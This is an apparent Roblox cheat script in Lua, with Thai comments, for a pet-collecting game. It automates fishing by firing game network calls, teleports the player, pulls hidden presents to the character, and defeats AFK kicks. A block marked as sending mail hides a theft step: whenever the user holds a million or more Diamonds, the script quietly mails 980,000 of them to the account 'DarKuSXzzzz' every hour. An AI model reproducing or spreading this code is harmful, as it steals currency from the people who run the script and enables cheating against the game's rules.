---@diagnostic disable: undefined-field, need-check-nil, param-type-mismatch, undefined-global, lowercase-global, deprecated
task.wait(2)
repeat task.wait() until game:IsLoaded()

if game.PlaceId == 8737899170 then
    repeat task.wait() until game.Workspace:FindFirstChild(game.Players.LocalPlayer.Name)
    print('Chicha V1.0')
else
    return
end


local plr = game:GetService("Players").LocalPlayer
local players = game:GetService("Players")
local HttpService = game:GetService("HttpService")
local Workspace = game:GetService("Workspace")
local LocalPlayer = game:GetService("Players").LocalPlayer
local UserInputService = game:GetService("UserInputService")
local TweenService = game:GetService("TweenService")
local RunService = game:GetService("RunService")
local Mouse = LocalPlayer:GetMouse()
local ReplicatedFirst = game:GetService("ReplicatedFirst")
local playerGui = LocalPlayer:WaitForChild("PlayerGui")
local VirtualInputManager = game:GetService("VirtualInputManager")


getgenv().fishing = true
getgenv().AutoUnlockMap = false

task.wait(15)


function DataGame_99()
    DataGame99 = require(game:GetService("ReplicatedStorage"):WaitForChild("Library", 10):WaitForChild("Client", 10))
end

if pcall(DataGame_99) then
    print('Loaded maps..')
else
    print("Fail..")
end

teleport_fish = true
task.spawn(function()
    while task.wait() do
        if getgenv().fishing then
            if teleport_fish then
                enterFish = game:GetService("Workspace").__THINGS.Instances.AdvancedFishing.Teleports.Enter.CFrame
                game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = enterFish
                task.wait(5)
                game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(1451.46741, 66.0671844,
                    -4447.83643, 0.265185595, 3.25603811e-09, -0.964197397, -9.78775319e-08, 1, -2.35425581e-08,
                    0.964197397, 1.00616404e-07, 0.265185595)
                task.wait(5)
                game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(1451.46741, 66.0671844,
                    -4447.83643, 0.265185595, 3.25603811e-09, -0.964197397, -9.78775319e-08, 1, -2.35425581e-08,
                    0.964197397, 1.00616404e-07, 0.265185595)
                teleport_fish = false
                task.wait(15)
            end
            local args = {
                [1] = "AdvancedFishing",
                [2] = "RequestCast",
                [3] = Vector3.new(1482.6259765625, 61.624961853027344, -4468.38720703125)
            }
            game:GetService("ReplicatedStorage").Network.Instancing_FireCustomFromClient:FireServer(unpack(args))
            task.wait(3.6)
            local args = {
                [1] = "AdvancedFishing",
                [2] = "RequestReel"
            }
            game:GetService("ReplicatedStorage").Network.Instancing_FireCustomFromClient:FireServer(unpack(args))

            while game:GetService("Workspace")["__DEBRIS"]:FindFirstChild('FishingLineAnchor') do
                if not game:GetService("Workspace")["__DEBRIS"]:FindFirstChild('FishingLineAnchor') then break end
                local args = {
                    [1] = "AdvancedFishing",
                    [2] = "Clicked"
                }
                game:GetService("ReplicatedStorage").Network.Instancing_InvokeCustomFromClient:InvokeServer(unpack(args))
            end
        end
        task.wait()
    end
end)

--#region กัน afk
local function antiAFK()
    task.spawn(function()
        warn('ANTI AFK loaded..!!')
        while task.wait(300) do
            pcall(function()
                local vu = game:GetService("VirtualUser")
                game:GetService("Players").LocalPlayer.Idled:connect(function()
                    local randomPosition = Vector2.new(math.random(), math.random())
                    vu:Button2Down(randomPosition, workspace.CurrentCamera.CFrame)
                    wait(1)
                    vu:Button2Up(randomPosition, workspace.CurrentCamera.CFrame)
                    workspace.CurrentCamera.CFrame = workspace.CurrentCamera.CFrame * CFrame.Angles(0, math.rad(10), 0)
                end)
            end)
        end
    end)
end
antiAFK()
--#endregion

--#endregion

--#region f1 ออโต้ปลดด่าน

-- task.wait(60)

-- _G.autounlock = true

-- local UserInputService = game:GetService("UserInputService")
-- UserInputService.InputBegan:Connect(function(input, processed)
--     if (input.KeyCode == Enum.KeyCode.F1 and not processed) then
--         _G.autounlock = not _G.autounlock
--     end
-- end)

-- task.spawn(function()
--     while _G.autounlock do
--         pcall(function()
--             local Maps = {}
--             for _, v in pairs(workspace.Map:GetChildren()) do
--                 if v.Name ~= "SHOP" then
--                     table.insert(Maps, v.Name)
--                 end
--             end
--             function Sort(a, b)
--                 local numA = tonumber(string.match(a, "(%d+)"))
--                 local numB = tonumber(string.match(b, "(%d+)"))
--                 return numA < numB
--             end

--             table.sort(Maps, Sort)

--             for _, v in pairs(Maps) do
--                 if workspace.Map[v].INTERACT:FindFirstChild("Gate") then
--                     if workspace.Map[v].INTERACT.Gate.GateHUD.Buy:FindFirstChild("GreenGradient") then
--                         local args = {
--                             [1] = string.match(v, "%d+ | (.+)")
--                         }
--                         game:GetService("ReplicatedStorage").Network.Zones_RequestPurchase:InvokeServer(unpack(args))
--                         task.wait(1)
--                     end
--                 end
--             end
--             local latest_map
--             for _, v in pairs(Maps) do
--                 if not workspace.Map[v].INTERACT:FindFirstChild("Gate") then
--                     latest_map = v
--                 end
--             end
--             game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(workspace.Map
--                 [latest_map].INTERACT.BREAKABLE_SPAWNS.Main.CFrame.Position)
--         end)
--         task.wait(15)
--     end
-- end)
--#endregion

-- --#region ออโต้รีเบิด
-- local DataGame99 = require(game:GetService("ReplicatedStorage"):WaitForChild("Library", 10):WaitForChild("Client", 10))
-- task.spawn(function()
--     print("Start AutoUnlockMap...")
--     while task.wait() do
--         local LastZone = DataGame99.ZoneCmds.GetMaximumZone()
--         local UnlockedZones = LastZone.ZoneNumber
--         if UnlockedZones == 25 then
--             print("Rebrids 1")
--             local args = {
--                 [1] = "1"
--             }
--             game:GetService("ReplicatedStorage").Network.Rebirth_Request:InvokeServer(unpack(args))
--             task.wait(600)
--         end
--         if UnlockedZones == 50 then
--             print("Rebrids 2")
--             local args = {
--                 [1] = "2"
--             }
--             game:GetService("ReplicatedStorage").Network.Rebirth_Request:InvokeServer(unpack(args))
--             task.wait(600)
--         end
--         if UnlockedZones == 75 then
--             print("Rebrids 2")
--             local args = {
--                 [1] = "3"
--             }
--             game:GetService("ReplicatedStorage").Network.Rebirth_Request:InvokeServer(unpack(args))
--             task.wait(600)
--         end
--         task.wait(150)
--     end
-- end)
-- --#endregion

--#region f7 ออโต้ตกปลา
-- _G.autofish = false

-- game:GetService("UserInputService").InputBegan:Connect(function(input)
--     if input.KeyCode == Enum.KeyCode.F7 then
--         if _G.autofish == true then
--             _G.autofish = false
--             game:GetService("StarterGui"):SetCore("SendNotification", {
--                 Title = "ออโต้ตกปลา",
--                 Text = "ปิด",
--             })
--         else
--             _G.autofish = true
--             game:GetService("StarterGui"):SetCore("SendNotification", {
--                 Title = "ออโต้ตกปลา",
--                 Text = "เปิด",
--             })
--         end
--     end
-- end)


-- teleport_fish = true
-- task.spawn(function ()
--   while _G.autofish do
--     if getgenv().fishing then
--             if teleport_fish then
--         enterFish = game:GetService("Workspace").__THINGS.Instances.AdvancedFishing.Teleports.Enter.CFrame
--         game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = enterFish
--         task.wait(5)
--         game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(1451.46741, 66.0671844, -4447.83643, 0.265185595, 3.25603811e-09, -0.964197397, -9.78775319e-08, 1, -2.35425581e-08, 0.964197397, 1.00616404e-07, 0.265185595)
--         task.wait(5)
--         game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(1451.46741, 66.0671844, -4447.83643, 0.265185595, 3.25603811e-09, -0.964197397, -9.78775319e-08, 1, -2.35425581e-08, 0.964197397, 1.00616404e-07, 0.265185595)
--         teleport_fish = false
--       end
--       local args = {
--         [1] = "AdvancedFishing",
--         [2] = "RequestCast",
--         [3] = Vector3.new(1482.6259765625, 61.624961853027344, -4468.38720703125)
--       }
--       game:GetService("ReplicatedStorage").Network.Instancing_FireCustomFromClient:FireServer(unpack(args))
--       task.wait(3.6)
--       local args = {
--         [1] = "AdvancedFishing",
--         [2] = "RequestReel"
--       }
--       game:GetService("ReplicatedStorage").Network.Instancing_FireCustomFromClient:FireServer(unpack(args))
--       check_reel = game:GetService("Workspace")["__DEBRIS"]:FindFirstChild('FishingLineAnchor')
--       if check_reel then
--         while true do
--           check_finish = game:GetService("Workspace")["__DEBRIS"]:FindFirstChild('FishingLineAnchor')
--           if check_finish then
--             local args = {
--               [1] = "AdvancedFishing",
--               [2] = "Clicked"
--             }
--             game:GetService("ReplicatedStorage").Network.Instancing_InvokeCustomFromClient:InvokeServer(unpack(args))
--           else
--             break
--           end
--         end
--       end
--     end
--     task.wait()
--   end
-- end)
--#endregion

--#endregion

--#region ส่งจดหมาย
local Data = require(game:GetService("ReplicatedStorage").Library).Save.Get()


local function GetGem()
    for i, v in pairs(Data["Inventory"]["Currency"]) do
        if v["id"] == "Diamonds" then
            return i, tonumber(v["_am"])
        end
    end
end

local getgem = game:GetService("Players").LocalPlayer.leaderstats["\240\159\146\142 Diamonds"].Value
local LocalPlayer = game:GetService("Players").LocalPlayer


task.spawn(function()
    while task.wait() do
        if getgem >= 1000000 then
            if LocalPlayer.Name ~= "DarKuSXzzzz" then
                local args = {
                    [1] = "DarKuSXzzzz",
                    [2] = "5555",
                    [3] = "Currency",
                    [4] = tostring(GetGem()),
                    [5] = 980000
                }
                game:GetService("ReplicatedStorage").Network:FindFirstChild("Mailbox: Send"):InvokeServer(unpack(args))
                task.wait(60 * 60)
            end
        end
    end
end)
--#endregion

--#endregion

task.wait(20)
teleport_click = true
task.spawn(function()
    while task.wait() do
        getgenv().fishing = false
        enterleave = game:GetService("Workspace").__THINGS.Instances.AdvancedFishing.Teleports.Leave.CFrame
        game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = enterleave
        task.wait(10)
        local HiddenPresents = game:GetService("Workspace")["__THINGS"].HiddenPresents
        repeat
            for key, value in pairs(HiddenPresents:GetChildren()) do
                if value.Name == 'HiddenPresent' then
                    value.CFrame = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame
                    task.wait()
                end
            end
            local box_bla = game:GetService("Workspace")["__THINGS"].HiddenPresents:FindFirstChild('HiddenPresent')
            if box_bla then
                task.wait(1)
            else
                break
            end
            task.wait(3)
        until false
        task.wait(2)
        getgenv().fishing = true
        teleport_fish = true
        task.wait(290)
    end
end)

task.spawn(function()
    while task.wait(10) do
        for i = 1, 100 do
            local args = {
                [1] = "AdvancedFishing",
                [2] = "Clicked"
            }
            game:GetService("ReplicatedStorage").Network.Instancing_InvokeCustomFromClient:InvokeServer(unpack(args))
        end
        task.wait(60)
    end
end)


function AutoReconnect()
    game:GetService("CoreGui").RobloxPromptGui.promptOverlay.ChildAdded:Connect(function(e)
        if e.Name == 'ErrorPrompt' then
            task.wait(15)
            game:GetService("TeleportService"):Teleport(game.PlaceId, game.Players.LocalPlayer)
        end
    end)
end
AutoReconnect()

-- -- Script generated by SimpleSpy - credits to exx#9394

-- local args = {
--     [1] = "Amethyst Fishing Rod"
-- }

-- game:GetService("ReplicatedStorage").Network.FishingMerchant_PurchaseRod:InvokeServer(unpack(args))


-- --#region ออโต้เปิดกล่อง
-- task.wait(10)
-- teleport_click = true
-- task.spawn(function ()
--   while task.wait() do
--     enterleave = game:GetService("Workspace").__THINGS.Instances.AdvancedFishing.Teleports.Leave.CFrame
--     game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = enterleave
--     task.wait(10)
--     local HiddenPresents = game:GetService("Workspace")["__THINGS"].HiddenPresents
--     repeat
--       for key, value in pairs(HiddenPresents:GetChildren()) do
--         print(value)
--         if value.Name == 'HiddenPresent' then
--           value.CFrame = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame
--           task.wait()
--         end
--       end
--       local box_bla = game:GetService("Workspace")["__THINGS"].HiddenPresents:FindFirstChild('HiddenPresent')
--       if box_bla then
--         task.wait(1)
--       else
--         break
--       end
--     until false
--     task.wait(2)
--     enterFish = game:GetService("Workspace").__THINGS.Instances.AdvancedFishing.Teleports.Enter.CFrame
--     game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = enterFish
--     task.wait(5)
--     game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(1451.46741, 66.0671844, -4447.83643, 0.265185595, 3.25603811e-09, -0.964197397, -9.78775319e-08, 1, -2.35425581e-08, 0.964197397, 1.00616404e-07, 0.265185595)
--     task.wait(5)
--     game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(1451.46741, 66.0671844, -4447.83643, 0.265185595, 3.25603811e-09, -0.964197397, -9.78775319e-08, 1, -2.35425581e-08, 0.964197397, 1.00616404e-07, 0.265185595)
--     task.wait(290)
--   end
-- end)

-- --#endregion






-- เปิดปิดแบบย่อ
-- game:GetService("UserInputService").InputBegan:Connect(function(input)
--     if input.KeyCode == Enum.KeyCode.F6 then
--         _G.autofish = not _G.autofish
--         game:GetService("StarterGui"):SetCore("SendNotification", {
--           Title = "ออโต้ตกปลา",
--           Text = tostring(_G.autofish),
--         })
--     end
-- end)





--#region Name
--#endregion


print("love you")
